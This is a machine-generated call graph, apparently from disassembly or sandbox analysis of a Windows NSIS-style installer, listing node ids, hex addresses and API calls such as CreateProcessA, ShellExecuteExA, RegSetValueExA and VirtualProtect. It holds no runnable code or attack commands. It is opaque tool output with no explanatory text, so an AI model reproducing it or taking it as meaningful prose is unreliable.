CharNextA 4164->4166 4174 405aba 4164->4174 4165->4164 4166->4161 4167->4149 4168->4149 4169->4138 4171 405f8c 4170->4171 4172 405f90 4171->4172 4173 405f95 RegOpenKeyExA 4171->4173 4172->4156 4172->4157 4173->4172 4175 405ac0 4174->4175 4176 405ad3 4175->4176 4177 405ac6 CharNextA 4175->4177 4176->4164 4177->4175 4178 401746 4184 402bce 4178->4184 4182 401754 4183 405cbf 2 API calls 4182->4183 4183->4182 4185 402bda 4184->4185 4186 40618a 17 API calls 4185->4186 4187 402bfb 4186->4187 4188 40174d 4187->4188 4189 4063d2 5 API calls 4187->4189 4190 405cbf 4188->4190 4189->4188 4191 405cca GetTickCount GetTempFileNameA 4190->4191 4192 405cfb 4191->4192 4193 405cf7 4191->4193 4192->4182 4193->4191 4193->4192 5704 4045c6 5705 4045d6 5704->5705 5706 4045fc 5704->5706 5707 40417b 18 API calls 5705->5707 5708 4041e2 8 API calls 5706->5708 5709 4045e3 SetDlgItemTextA 5707->5709 5710 404608 5708->5710 5709->5706 5569 401947 5570 402bce 17 API calls 5569->5570 5571 40194e lstrlenA 5570->5571 5572 402620 5571->5572 4194 403348 SetErrorMode GetVersion 4195 403389 4194->4195 4196 40338f 4194->4196 4197 406500 5 API calls 4195->4197 4284 406492 GetSystemDirectoryA 4196->4284 4197->4196 4199 4033a5 lstrlenA 4199->4196 4200 4033b4 4199->4200 4287 406500 GetModuleHandleA 4200->4287 4203 406500 5 API calls 4204 4033c2 4203->4204 4205 406500 5 API calls 4204->4205 4206 4033ce #17 OleInitialize SHGetFileInfoA 4205->4206 4293 4060f7 lstrcpynA 4206->4293 4209 40341a GetCommandLineA 4294 4060f7 lstrcpynA 4209->4294 4211 40342c 4212 405aba CharNextA 4211->4212 4213 403455 CharNextA 4212->4213 4222 403465 4213->4222 4214 40352f 4215 403542 GetTempPathA 4214->4215 4295 403317 4215->4295 4217 40355a 4218 4035b4 DeleteFileA 4217->4218 4219 40355e GetWindowsDirectoryA lstrcatA 4217->4219 4305 402ea1 GetTickCount GetModuleFileNameA 4218->4305 4223 403317 12 API calls 4219->4223 4220 405aba CharNextA 4220->4222 4222->4214 4222->4220 4226 403531 4222->4226 4225 40357a 4223->4225 4224 4035c8 4232 405aba CharNextA 4224->4232 4266 40364e 4224->4266 4279 40365e 4224->4279 4225->4218 4228 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4225->4228 4390 4060f7 lstrcpynA 4226->4390 4230 403317 12 API calls 4228->4230 4234 4035ac 4230->4234 4247 4035e3 4232->4247 4234->4218 4234->4279 4235 403796 4238 403818 ExitProcess 4235->4238 4239 40379e GetCurrentProcess OpenProcessToken 4235->4239 4236 403678 4414 405813 4236->4414 4244 4037e9 4239->4244 4245 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 4239->4245 4241 403629 4391 405b7d 4241->4391 4242 40368e 4418 40577e 4242->4418 4246 406500 5 API calls 4244->4246 4245->4244 4250 4037f0 4246->4250 4247->4241 4247->4242 4253 403805 ExitWindowsEx 4250->4253 4257 403811 4250->4257 4253->4238 4253->4257 4254 4036a4 lstrcatA 4255 4036af lstrcatA lstrcmpiA 4254->4255 4256 4036cb 4255->4256 4255->4279 4259 4036d0 4256->4259 4260 4036d7 4256->4260 4438 40140b 4257->4438 4421 4056e4 CreateDirectoryA 4259->4421 4426 405761 CreateDirectoryA 4260->4426 4262 403643 4406 4060f7 lstrcpynA 4262->4406 4333 40390a 4266->4333 4268 4036dc SetCurrentDirectoryA 4269 4036f6 4268->4269 4270 4036eb 4268->4270 4430 4060f7 lstrcpynA 4269->4430 4429 4060f7 lstrcpynA 4270->4429 4273 40618a 17 API calls 4274 403735 DeleteFileA 4273->4274 4275 403742 CopyFileA 4274->4275 4281 403704 4274->4281 4275->4281 4276 40378a 4278 405ed6 36 API calls 4276->4278 4278->4279 4407 403830 4279->4407 4280 40618a 17 API calls 4280->4281 4281->4273 4281->4276 4281->4280 4283 403776 CloseHandle 4281->4283 4431 405ed6 MoveFileExA 4281->4431 4435 405796 CreateProcessA 4281->4435 4283->4281 4285 4064b4 wsprintfA LoadLibraryExA 4284->4285 4285->4199 4288 406526 GetProcAddress 4287->4288 4289 40651c 4287->4289 4292 4033bb 4288->4292 4290 406492 3 API calls 4289->4290 4291 406522 4290->4291 4291->4288 4291->4292 4292->4203 4293->4209 4294->4211 4296 4063d2 5 API calls 4295->4296 4298 403323 4296->4298 4297 40332d 4297->4217 4298->4297 4441 405a8f lstrlenA CharPrevA 4298->4441 4301 405761 2 API calls 4302 40333b 4301->4302 4303 405cbf 2 API calls 4302->4303 4304 403346 4303->4304 4304->4217 4444 405c90 GetFileAttributesA CreateFileA 4305->4444 4307 402ee1 4332 402ef1 4307->4332 4445 4060f7 lstrcpynA 4307->4445 4309 402f07 4446 405ad6 lstrlenA 4309->4446 4313 402f18 GetFileSize 4314 403012 4313->4314 4331 402f2f 4313->4331 4451 402e3d 4314->4451 4316 40301b 4318 40304b GlobalAlloc 4316->4318 4316->4332 4486 403300 SetFilePointer 4316->4486 4462 403300 SetFilePointer 4318->4462 4320 40307e 4322 402e3d 6 API calls 4320->4322 4322->4332 4323 403034 4325 4032ea ReadFile 4323->4325 4324 403066 4463 4030d8 4324->4463 4327 40303f 4325->4327 4327->4318 4327->4332 4328 402e3d 6 API calls 4328->4331 4329 403072 4329->4329 4330 4030af SetFilePointer 4329->4330 4329->4332 4330->4332 4331->4314 4331->4320 4331->4328 4331->4332 4483 4032ea 4331->4483 4332->4224 4334 406500 5 API calls 4333->4334 4335 40391e 4334->4335 4336 403924 4335->4336 4337 403936 4335->4337 4515 406055 wsprintfA 4336->4515 4338 405fde 3 API calls 4337->4338 4339 403961 4338->4339 4341 40397f lstrcatA 4339->4341 4343 405fde 3 API calls 4339->4343 4342 403934 4341->4342 4507 403bcf 4342->4507 4343->4341 4346 405b7d 18 API calls 4347 4039b1 4346->4347 4348 403a3a 4347->4348 4350 405fde 3 API calls 4347->4350 4349 405b7d 18 API calls 4348->4349 4351 403a40 4349->4351 4352 4039dd 4350->4352 4353 403a50 LoadImageA 4351->4353 4354 40618a 17 API calls 4351->4354 4352->4348 4357 4039f9 lstrlenA 4352->4357 4361 405aba CharNextA 4352->4361 4355 403af6 4353->4355 4356 403a77 RegisterClassA 4353->4356 4354->4353 4360 40140b 2 API calls 4355->4360 4358 403b00 4356->4358 4359 403aad SystemParametersInfoA CreateWindowExA 4356->4359 4362 403a07 lstrcmpiA 4357->4362 4363 403a2d 4357->4363 4358->4279 4359->4355 4364 403afc 4360->4364 4365 4039f7 4361->4365 4362->4363 4366 403a17 GetFileAttributesA 4362->4366 4367 405a8f 3 API calls 4363->4367 4364->4358 4369 403bcf 18 API calls 4364->4369 4365->4357 4368 403a23 4366->4368 4370 403a33 4367->4370 4368->4363 4371 405ad6 2 API calls 4368->4371 4372 403b0d 4369->4372 4516 4060f7 lstrcpynA 4370->4516 4371->4363 4374 403b19 ShowWindow 4372->4374 4375 403b9c 4372->4375 4376 406492 3 API calls 4374->4376 4517 4052f0 OleInitialize 4375->4517 4378 403b31 4376->4378 4380 403b3f GetClassInfoA 4378->4380 4383 406492 3 API calls 4378->4383 4379 403ba2 4381 403ba6 4379->4381 4382 403bbe 4379->4382 4385 403b53 GetClassInfoA RegisterClassA 4380->4385 4386 403b69 DialogBoxParamA 4380->4386 4381->4358 4387 40140b 2 API calls 4381->4387 4384 40140b 2 API calls 4382->4384 4383->4380 4384->4358 4385->4386 4388 40140b 2 API calls 4386->4388 4387->4358 4389 403b91 4388->4389 4389->4358 4390->4215 4535 4060f7 lstrcpynA 4391->4535 4393 405b8e 4536 405b28 CharNextA CharNextA 4393->4536 4396 403634 4396->4279 4405 4060f7 lstrcpynA 4396->4405 4397 4063d2 5 API calls 4403 405ba4 4397->4403 4398 405bcf lstrlenA 4399 405bda 4398->4399 4398->4403 4401 405a8f 3 API calls 4399->4401 4402 405bdf GetFileAttributesA 4401->4402 4402->4396 4403->4396 4403->4398 4404 405ad6 2 API calls 4403->4404 4542 40646b FindFirstFileA 4403->4542 4404->4398 4405->4262 4406->4266 4408 403848 4407->4408 4409 40383a CloseHandle 4407->4409 4545 403875 4408->4545 4409->4408 4415 405828 4414->4415 4416 40583c MessageBoxIndirectA 4415->4416 4417 403686 ExitProcess 4415->4417 4416->4417 4419 406500 5 API calls 4418->4419 4420 403693 lstrcatA 4419->4420 4420->4254 4420->4255 4422 4036d5 4421->4422 4423 405735 GetLastError 4421->4423 4422->4268 4423->4422 4424 405744 SetFileSecurityA 4423->4424 4424->4422 4425 40575a GetLastError 4424->4425 4425->4422 4427 405771 4426->4427 4428 405775 GetLastError 4426->4428 4427->4268 4428->4427 4429->4269 4430->4281 4432 405ef7 4431->4432 4433 405eea 4431->4433 4432->4281 4602 405d66 4433->4602 4436 4057d5 4435->4436 4437 4057c9 CloseHandle 4435->4437 4436->4281 4437->4436 4439 401389 2 API calls 4438->4439 4440 401420 4439->4440 4440->4238 4442 403335 4441->4442 4443 405aa9 lstrcatA 4441->4443 4442->4301 4443->4442 4444->4307 4445->4309 4447 405ae3 4446->4447 4448 402f0d 4447->4448 4449 405ae8 CharPrevA 4447->4449 4450 4060f7 lstrcpynA 4448->4450 4449->4447 4449->4448 4450->4313 4452 402e46 4451->4452 4453 402e5e 4451->4453 4454 402e56 4452->4454 4455 402e4f DestroyWindow 4452->4455 4456 402e66 4453->4456 4457 402e6e GetTickCount 4453->4457 4454->4316 4455->4454 4487 40653c 4456->4487 4458 402e7c CreateDialogParamA ShowWindow 4457->4458 4459 402e9f 4457->4459 4458->4459 4459->4316 4462->4324 4464 4030ee 4463->4464 4465 40311c 4464->4465 4493 403300 SetFilePointer 4464->4493 4467 4032ea ReadFile 4465->4467 4468 403127 4467->4468 4469 403283 4468->4469 4470 403139 GetTickCount 4468->4470 4476 40326d 4468->4476 4471 4032c5 4469->4471 4478 403287 4469->4478 4470->4476 4482 403188 4470->4482 4472 4032ea ReadFile 4471->4472 4472->4476 4473 4032ea ReadFile 4473->4482 4474 4032ea ReadFile 4474->4478 4475 405d37 WriteFile 4475->4478 4476->4329 4477 4031de GetTickCount 4477->4482 4478->4474 4478->4475 4478->4476 4479 403203 MulDiv wsprintfA 4494 40521e 4479->4494 4482->4473 4482->4476 4482->4477 4482->4479 4491 405d37 WriteFile 4482->4491 4505 405d08 ReadFile 4483->4505 4486->4323 4488 406559 PeekMessageA 4487->4488 4489 402e6c 4488->4489 4490 40654f DispatchMessageA 4488->4490 4489->4316 4490->4488 4492 405d55 4491->4492 4492->4482 4493->4465 4495 405239 4494->4495 4504 4052dc 4494->4504 4496 405256 lstrlenA 4495->4496 4497 40618a 17 API calls 4495->4497 4498 405264 lstrlenA 4496->4498 4499 40527f 4496->4499 4497->4496 4500 405276 lstrcatA 4498->4500 4498->4504 4501 405292 4499->4501 4502 405285 SetWindowTextA 4499->4502 4500->4499 4503 405298 SendMessageA SendMessageA SendMessageA 4501->4503 4501->4504 4502->4501 4503->4504 4504->4482 4506 4032fd 4505->4506 4506->4331 4508 403be3 4507->4508 4524 406055 wsprintfA 4508->4524 4510 403c54 4525 403c88 4510->4525 4512 40398f 4512->4346 4513 403c59 4513->4512 4514 40618a 17 API calls 4513->4514 4514->4513 4515->4342 4516->4348 4528 4041c7 4517->4528 4519 4041c7 SendMessageA 4521 40534c OleUninitialize 4519->4521 4520 405313 4522 40533a 4520->4522 4531 401389 4520->4531 4521->4379 4522->4519 4524->4510 4526 40618a 17 API calls 4525->4526 4527 403c96 SetWindowTextA 4526->4527 4527->4513 4529 4041d0 SendMessageA 4528->4529 4530 4041df 4528->4530 4529->4530 4530->4520 4532 401390 4531->4532 4533 4013fe 4532->4533 4534 4013cb MulDiv SendMessageA 4532->4534 4533->4520 4534->4532 4535->4393 4537 405b43 4536->4537 4541 405b53 4536->4541 4538 405b4e CharNextA 4537->4538 4537->4541 4539 405b73 4538->4539 4539->4396 4539->4397 4540 405aba CharNextA 4540->4541 4541->4539 4541->4540 4543 406481 FindClose 4542->4543 4544 40648c 4542->4544 4543->4544 4544->4403 4546 403883 4545->4546 4547 40384d 4546->4547 4548 403888 FreeLibrary GlobalFree 4546->4548 4549 4058bf 4547->4549 4548->4547 4548->4548 4550 405b7d 18 API calls 4549->4550 4551 4058df 4550->4551 4552 4058e7 DeleteFileA 4551->4552 4553 4058fe 4551->4553 4554 403667 OleUninitialize 4552->4554 4555 405a2c 4553->4555 4589 4060f7 lstrcpynA 4553->4589 4554->4235 4554->4236 4555->4554 4560 40646b 2 API calls 4555->4560 4557 405924 4558 405937 4557->4558 4559 40592a lstrcatA 4557->4559 4562 405ad6 2 API calls 4558->4562 4561 40593d 4559->4561 4563 405a50 4560->4563 4564 40594b lstrcatA 4561->4564 4566 405956 lstrlenA FindFirstFileA 4561->4566 4562->4561 4563->4554 4565 405a54 4563->4565 4564->4566 4567 405a8f 3 API calls 4565->4567 4566->4555 4571 40597a 4566->4571 4568 405a5a 4567->4568 4570 405877 5 API calls 4568->4570 4569 405aba CharNextA 4569->4571 4572 405a66 4570->4572 4571->4569 4576 405a0b FindNextFileA 4571->4576 4585 4059cc 4571->4585 4590 4060f7 lstrcpynA 4571->4590 4573 405a80 4572->4573 4574 405a6a 4572->4574 4575 40521e 24 API calls 4573->4575 4574->4554 4579 40521e 24 API calls 4574->4579 4575->4554 4576->4571 4578 405a23 FindClose 4576->4578 4578->4555 4580 405a77 4579->4580 4581 405ed6 36 API calls 4580->4581 4584 405a7e 4581->4584 4583 4058bf 60 API calls 4583->4585 4584->4554 4585->4576 4585->4583 4586 40521e 24 API calls 4585->4586 4587 40521e 24 API calls 4585->4587 4588 405ed6 36 API calls 4585->4588 4591 405877 4585->4591 4586->4576 4587->4585 4588->4585 4589->4557 4590->4571 4599 405c6b GetFileAttributesA 4591->4599 4594 4058a4 4594->4585 4595 405892 RemoveDirectoryA 4597 4058a0 4595->4597 4596 40589a DeleteFileA 4596->4597 4597->4594 4598 4058b0 SetFileAttributesA 4597->4598 4598->4594 4600 405883 4599->4600 4601 405c7d SetFileAttributesA 4599->4601 4600->4594 4600->4595 4600->4596 4601->4600 4603 405db2 GetShortPathNameA 4602->4603 4604 405d8c 4602->4604 4606 405ed1 4603->4606 4607 405dc7 4603->4607 4629 405c90 GetFileAttributesA CreateFileA 4604->4629 4606->4432 4607->4606 4609 405dcf wsprintfA 4607->4609 4608 405d96 CloseHandle GetShortPathNameA 4608->4606 4610 405daa 4608->4610 4611 40618a 17 API calls 4609->4611 4610->4603 4610->4606 4612 405df7 4611->4612 4630 405c90 GetFileAttributesA CreateFileA 4612->4630 4614 405e04 4614->4606 4615 405e13 GetFileSize GlobalAlloc 4614->4615 4616 405e35 4615->4616 4617 405eca CloseHandle 4615->4617 4618 405d08 ReadFile 4616->4618 4617->4606 4619 405e3d 4618->4619 4619->4617 4631 405bf5 lstrlenA 4619->4631 4622 405e54 lstrcpyA 4627 405e76 4622->4627 4623 405e68 4624 405bf5 4 API calls 4623->4624 4624->4627 4625 405ead SetFilePointer 4626 405d37 WriteFile 4625->4626 4628 405ec3 GlobalFree 4626->4628 4627->4625 4628->4617 4629->4608 4630->4614 4632 405c36 lstrlenA 4631->4632 4633 405c3e 4632->4633 4634 405c0f lstrcmpiA 4632->4634 4633->4622 4633->4623 4634->4633 4635 405c2d CharNextA 4634->4635 4635->4632 5351 4038c8 5352 4038d3 5351->5352 5353 4038d7 5352->5353 5354 4038da GlobalAlloc 5352->5354 5354->5353 5711 401fcb 5712 402bce 17 API calls 5711->5712 5713 401fd2 5712->5713 5714 40646b 2 API calls 5713->5714 5715 401fd8 5714->5715 5717 401fea 5715->5717 5718 406055 wsprintfA 5715->5718 5718->5717 4657 742f2921 4658 742f2971 4657->4658 4659 742f2931 VirtualProtect 4657->4659 4659->4658 5134 742f103d 5137 742f101b 5134->5137 5144 742f14bb 5137->5144 5139 742f1020 5140 742f1027 GlobalAlloc 5139->5140 5141 742f1024 5139->5141 5140->5141 5142 742f14e2 3 API calls 5141->5142 5143 742f103b 5142->5143 5146 742f14c1 5144->5146 5145 742f14c7 5145->5139 5146->5145 5147 742f14d3 GlobalFree 5146->5147 5147->5139 4660 4014d6 4661 402bac 17 API calls 4660->4661 4662 4014dc Sleep 4661->4662 4664 402a5a 4662->4664 5148 742f1638 5149 742f1667 5148->5149 5150 742f1a98 18 API calls 5149->5150 5151 742f166e 5150->5151 5152 742f1675 5151->5152 5153 742f1681 5151->5153 5154 742f1266 2 API calls 5152->5154 5155 742f168b 5153->5155 5156 742f16a8 5153->5156 5159 742f167f 5154->5159 5160 742f14e2 3 API calls 5155->5160 5157 742f16ae 5156->5157 5158 742f16d2 5156->5158 5161 742f1559 3 API calls 5157->5161 5162 742f14e2 3 API calls 5158->5162 5163 742f1690 5160->5163 5164 742f16b3 5161->5164 5162->5159 5165 742f1559 3 API calls 5163->5165 5166 742f1266 2 API calls 5164->5166 5167 742f1696 5165->5167 5168 742f16b9 GlobalFree 5166->5168 5169 742f1266 2 API calls 5167->5169 5168->5159 5170 742f16cd GlobalFree 5168->5170 5171 742f169c GlobalFree 5169->5171 5170->5159 5171->5159 5172 742f1837 5174 742f185a 5172->5174 5173 742f189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5176 742f1266 2 API calls 5173->5176 5174->5173 5175 742f188a GlobalFree 5174->5175 5175->5173 5177 742f1a1e GlobalFree GlobalFree 5176->5177 4677 401759 4678 402bce 17 API calls 4677->4678 4679 401760 4678->4679 4680 401786 4679->4680 4681 40177e 4679->4681 4718 4060f7 lstrcpynA 4680->4718 4717 4060f7 lstrcpynA 4681->4717 4684 401784 4688 4063d2 5 API calls 4684->4688 4685 401791 4686 405a8f 3 API calls 4685->4686 4687 401797 lstrcatA 4686->4687 4687->4684 4708 4017a3 4688->4708 4689 4017e4 4691 405c6b 2 API calls 4689->4691 4690 40646b 2 API calls 4690->4708 4691->4708 4693 4017ba CompareFileTime 4693->4708 4694 40187e 4696 40521e 24 API calls 4694->4696 4695 401855 4697 40521e 24 API calls 4695->4697 4714 40186a 4695->4714 4698 401888 4696->4698 4697->4714 4699 4030d8 31 API calls 4698->4699 4700 40189b 4699->4700 4701 4018af SetFileTime 4700->4701 4702 4018c1 CloseHandle 4700->4702 4701->4702 4704 4018d2 4702->4704 4702->4714 4703 40618a 17 API calls 4703->4708 4705 4018d7 4704->4705 4706 4018ea 4704->4706 4709 40618a 17 API calls 4705->4709 4710 40618a 17 API calls 4706->4710 4707 4060f7 lstrcpynA 4707->4708 4708->4689 4708->4690 4708->4693 4708->4694 4708->4695 4708->4703 4708->4707 4711 405813 MessageBoxIndirectA 4708->4711 4716 405c90 GetFileAttributesA CreateFileA 4708->4716 4712 4018df lstrcatA 4709->4712 4713 4018f2 4710->4713 4711->4708 4712->4713 4713->4714 4715 405813 MessageBoxIndirectA 4713->4715 4715->4714 4716->4708 4717->4684 4718->4685 5573 401959 5574 402bac 17 API calls 5573->5574 5575 401960 5574->5575 5576 402bac 17 API calls 5575->5576 5577 40196d 5576->5577 5578 402bce 17 API calls 5577->5578 5579 401984 lstrlenA 5578->5579 5581 401994 5579->5581 5580 4019d4 5581->5580 5585 4060f7 lstrcpynA 5581->5585 5583 4019c4 5583->5580 5584 4019c9 lstrlenA 5583->5584 5584->5580 5585->5583 5586 40535c 5587 405507 5586->5587 5588 40537e GetDlgItem GetDlgItem GetDlgItem 5586->5588 5589 405537 5587->5589 5590 40550f GetDlgItem CreateThread CloseHandle 5587->5590 5631 4041b0 SendMessageA 5588->5631 5592 405565 5589->5592 5594 405586 5589->5594 5595 40554d ShowWindow ShowWindow 5589->5595 5590->5589 5596 4055c0 5592->5596 5599 405575 5592->5599 5600 405599 ShowWindow 5592->5600 5593 4053ee 5597 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5593->5597 5601 4041e2 8 API calls 5594->5601 5633 4041b0 SendMessageA 5595->5633 5596->5594 5604 4055cd SendMessageA 5596->5604 5602 405463 5597->5602 5603 405447 SendMessageA SendMessageA 5597->5603 5605 404154 SendMessageA 5599->5605 5607 4055b9 5600->5607 5608 4055ab 5600->5608 5606 405592 5601->5606 5610 405476 5602->5610 5611 405468 SendMessageA 5602->5611 5603->5602 5604->5606 5612 4055e6 CreatePopupMenu 5604->5612 5605->5594 5609 404154 SendMessageA 5607->5609 5613 40521e 24 API calls 5608->5613 5609->5596 5615 40417b 18 API calls 5610->5615 5611->5610 5614 40618a 17 API calls 5612->5614 5613->5607 5616 4055f6 AppendMenuA 5614->5616 5617 405486 5615->5617 5618 405614 GetWindowRect 5616->5618 5619 405627 TrackPopupMenu 5616->5619 5620 4054c3 GetDlgItem SendMessageA 5617->5620 5621 40548f ShowWindow 5617->5621 5618->5619 5619->5606 5622 405643 5619->5622 5620->5606 5625 4054ea SendMessageA SendMessageA 5620->5625 5623 4054b2 5621->5623 5624 4054a5 ShowWindow 5621->5624 5626 405662 SendMessageA 5622->5626 5632 4041b0 SendMessageA 5623->5632 5624->5623 5625->5606 5626->5626 5627 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5626->5627 5629 4056a1 SendMessageA 5627->5629 5629->5629 5630 4056c3 GlobalUnlock SetClipboardData CloseClipboard 5629->5630 5630->5606 5631->5593 5632->5620 5633->5592 5634 40275d 5635 402763 5634->5635 5636 402a5a 5635->5636 5637 40276b FindClose 5635->5637 5637->5636 5178 401a5e 5179 402bac 17 API calls 5178->5179 5180 401a67 5179->5180 5181 402bac 17 API calls 5180->5181 5182 401a0e 5181->5182 5638 40495e 5639 40498a 5638->5639 5640 40496e 5638->5640 5642 404990 SHGetPathFromIDListA 5639->5642 5643 4049bd 5639->5643 5649 4057f7 GetDlgItemTextA 5640->5649 5645 4049a0 5642->5645 5646 4049a7 SendMessageA 5642->5646 5644 40497b SendMessageA 5644->5639 5647 40140b 2 API calls 5645->5647 5646->5643 5647->5646 5649->5644 5719 4029de 5720 406500 5 API calls 5719->5720 5721 4029e5 5720->5721 5722 402bce 17 API calls 5721->5722 5723 4029ee 5722->5723 5725 402a2a 5723->5725 5729 40614a 5723->5729 5726 4029fc 5726->5725 5733 406134 5726->5733 5730 406155 5729->5730 5731 406178 IIDFromString 5730->5731 5732 406171 5730->5732 5731->5726 5732->5726 5736 406119 WideCharToMultiByte 5733->5736 5735 402a1d CoTaskMemFree 5735->5725 5736->5735 4933 4023e0 4934 402bce 17 API calls 4933->4934 4935 4023f1 4934->4935 4936 402bce 17 API calls 4935->4936 4937 4023fa 4936->4937 4938 402bce 17 API calls 4937->4938 4939 402404 GetPrivateProfileStringA 4938->4939 5358 4028e0 5359 402bac 17 API calls 5358->5359 5360 4028e6 5359->5360 5361 402925 5360->5361 5362 40290e 5360->5362 5367 4027bf 5360->5367 5365 40293f 5361->5365 5366 40292f 5361->5366 5363 402922 5362->5363 5364 402913 5362->5364 5373 406055 wsprintfA 5363->5373 5372 4060f7 lstrcpynA 5364->5372 5369 40618a 17 API calls 5365->5369 5368 402bac 17 API calls 5366->5368 5368->5367 5369->5367 5372->5367 5373->5367 5650 401b63 5651 402bce 17 API calls 5650->5651 5652 401b6a 5651->5652 5653 402bac 17 API calls 5652->5653 5654 401b73 wsprintfA 5653->5654 5655 402a5a 5654->5655 5656 401d65 5657 401d78 GetDlgItem 5656->5657 5658 401d6b 5656->5658 5660 401d72 5657->5660 5659 402bac 17 API calls 5658->5659 5659->5660 5661 401db9 GetClientRect LoadImageA SendMessageA 5660->5661 5662 402bce 17 API calls 5660->5662 5664 401e1a 5661->5664 5666 401e26 5661->5666 5662->5661 5665 401e1f DeleteObject 5664->5665 5664->5666 5665->5666 5374 4042e6 5375 4042fc 5374->5375 5382 404408 5374->5382 5379 40417b 18 API calls 5375->5379 5376 404477 5377 404541 5376->5377 5378 404481 GetDlgItem 5376->5378 5384 4041e2 8 API calls 5377->5384 5380 404497 5378->5380 5381 4044ff 5378->5381 5383 404352 5379->5383 5380->5381 5389 4044bd SendMessageA LoadCursorA SetCursor 5380->5389 5381->5377 5390 404511 5381->5390 5382->5376 5382->5377 5385 40444c GetDlgItem SendMessageA 5382->5385 5386 40417b 18 API calls 5383->5386 5388 40453c 5384->5388 5407 40419d EnableWindow 5385->5407 5387 40435f CheckDlgButton 5386->5387 5405 40419d EnableWindow 5387->5405 5408 40458a 5389->5408 5394 404517 SendMessageA 5390->5394 5395 404528 5390->5395 5394->5395 5395->5388 5399 40452e SendMessageA 5395->5399 5396 404472 5400 404566 SendMessageA 5396->5400 5397 40437d GetDlgItem 5406 4041b0 SendMessageA 5397->5406 5399->5388 5400->5376 5402 404393 SendMessageA 5403 4043b1 GetSysColor 5402->5403 5404 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5402->5404 5403->5404 5404->5388 5405->5397 5406->5402 5407->5396 5411 4057d9 ShellExecuteExA 5408->5411 5410 4044f0 LoadCursorA SetCursor 5410->5381 5411->5410 4981 40166a 4982 402bce 17 API calls 4981->4982 4983 401671 4982->4983 4984 402bce 17 API calls 4983->4984 4985 40167a 4984->4985 4986 402bce 17 API calls 4985->4986 4987 401683 MoveFileA 4986->4987 4988 401696 4987->4988 4994 40168f 4987->4994 4989 4022e2 4988->4989 4991 40646b 2 API calls 4988->4991 4990 401423 24 API calls 4990->4989 4992 4016a5 4991->4992 4992->4989 4993 405ed6 36 API calls 4992->4993 4993->4994 4994->4990 4995 40216b 4996 402bce 17 API calls 4995->4996 4997 402172 4996->4997 4998 402bce 17 API calls 4997->4998 4999 40217c 4998->4999 5000 402bce 17 API calls 4999->5000 5001 402186 5000->5001 5002 402bce 17 API calls 5001->5002 5003 402193 5002->5003 5004 402bce 17 API calls 5003->5004 5005 40219d 5004->5005 5006 4021df CoCreateInstance 5005->5006 5007 402bce 17 API calls 5005->5007 5010 4021fe 5006->5010 5012 4022ac 5006->5012 5007->5006 5008 401423 24 API calls 5009 4022e2 5008->5009 5011 40228c MultiByteToWideChar 5010->5011 5010->5012 5011->5012 5012->5008 5012->5009 5412 4022eb 5413 402bce 17 API calls 5412->5413 5414 4022f1 5413->5414 5415 402bce 17 API calls 5414->5415 5416 4022fa 5415->5416 5417 402bce 17 API calls 5416->5417 5418 402303 5417->5418 5419 40646b 2 API calls 5418->5419 5420 40230c 5419->5420 5421 402310 5420->5421 5422 40231d lstrlenA lstrlenA 5420->5422 5423 40521e 24 API calls 5421->5423 5426 402318 5421->5426 5424 40521e 24 API calls 5422->5424 5423->5426 5425 402359 SHFileOperationA 5424->5425 5425->5421 5425->5426 5022 40266d 5023 402bac 17 API calls 5022->5023 5025 402677 5023->5025 5024 4026e5 5025->5024 5026 405d08 ReadFile 5025->5026 5027 4026e7 5025->5027 5030 4026f7 5025->5030 5026->5025 5031 406055 wsprintfA 5027->5031 5029 40270d SetFilePointer 5029->5024 5030->5024 5030->5029 5031->5024 5667 40236d 5668 402374 5667->5668 5670 402387 5667->5670 5669 40618a 17 API calls 5668->5669 5671 402381 5669->5671 5671->5670 5672 405813 MessageBoxIndirectA 5671->5672 5672->5670 5737 4019ed 5738 402bce 17 API calls 5737->5738 5739 4019f4 5738->5739 5740 402bce 17 API calls 5739->5740 5741 4019fd 5740->5741 5742 401a04 lstrcmpiA 5741->5742 5743 401a16 lstrcmpA 5741->5743 5744 401a0a 5742->5744 5743->5744 5673 40296e 5674 402bac 17 API calls 5673->5674 5675 402974 5674->5675 5676 4029af 5675->5676 5677 4027bf 5675->5677 5679 402986 5675->5679 5676->5677 5678 40618a 17 API calls 5676->5678 5678->5677 5679->5677 5681 406055 wsprintfA 5679->5681 5681->5677 5427 4014f4 SetForegroundWindow 5428 402a5a 5427->5428 5068 402476 5069 402bce 17 API calls 5068->5069 5070 402488 5069->5070 5071 402bce 17 API calls 5070->5071 5072 402492 5071->5072 5085 402c5e 5072->5085 5075 402a5a 5076 4024c7 5078 4024d3 5076->5078 5080 402bac 17 API calls 5076->5080 5077 402bce 17 API calls 5079 4024c0 lstrlenA 5077->5079 5081 4024f5 RegSetValueExA 5078->5081 5083 4030d8 31 API calls 5078->5083 5079->5076 5080->5078 5082 40250b RegCloseKey 5081->5082 5082->5075 5083->5081 5086 402c79 5085->5086 5089 405fab 5086->5089 5090 405fba 5089->5090 5091 4024a2 5090->5091 5092 405fc5 RegCreateKeyExA 5090->5092 5091->5075 5091->5076 5091->5077 5092->5091 5682 402777 5683 40277d 5682->5683 5684 402781 FindNextFileA 5683->5684 5686 402793 5683->5686 5685 4027d2 5684->5685 5684->5686 5688 4060f7 lstrcpynA 5685->5688 5688->5686 5429 401ef9 5430 402bce 17 API calls 5429->5430 5431 401eff 5430->5431 5432 402bce 17 API calls 5431->5432 5433 401f08 5432->5433 5434 402bce 17 API calls 5433->5434 5435 401f11 5434->5435 5436 402bce 17 API calls 5435->5436 5437 401f1a 5436->5437 5438 401423 24 API calls 5437->5438 5439 401f21 5438->5439 5446 4057d9 ShellExecuteExA 5439->5446 5441 401f5c 5442 406575 5 API calls 5441->5442 5443 4027bf 5441->5443 5444 401f76 CloseHandle 5442->5444 5444->5443 5446->5441 5093 401f7b 5094 402bce 17 API calls 5093->5094 5095 401f81 5094->5095 5096 40521e 24 API calls 5095->5096 5097 401f8b 5096->5097 5098 405796 2 API calls 5097->5098 5099 401f91 5098->5099 5100 401fb2 CloseHandle 5099->5100 5103 4027bf 5099->5103 5108 406575 WaitForSingleObject 5099->5108 5100->5103 5104 401fa6 5105 401fb4 5104->5105 5106 401fab 5104->5106 5105->5100 5113 406055 wsprintfA 5106->5113 5109 40658f 5108->5109 5110 4065a1 GetExitCodeProcess 5109->5110 5111 40653c 2 API calls 5109->5111 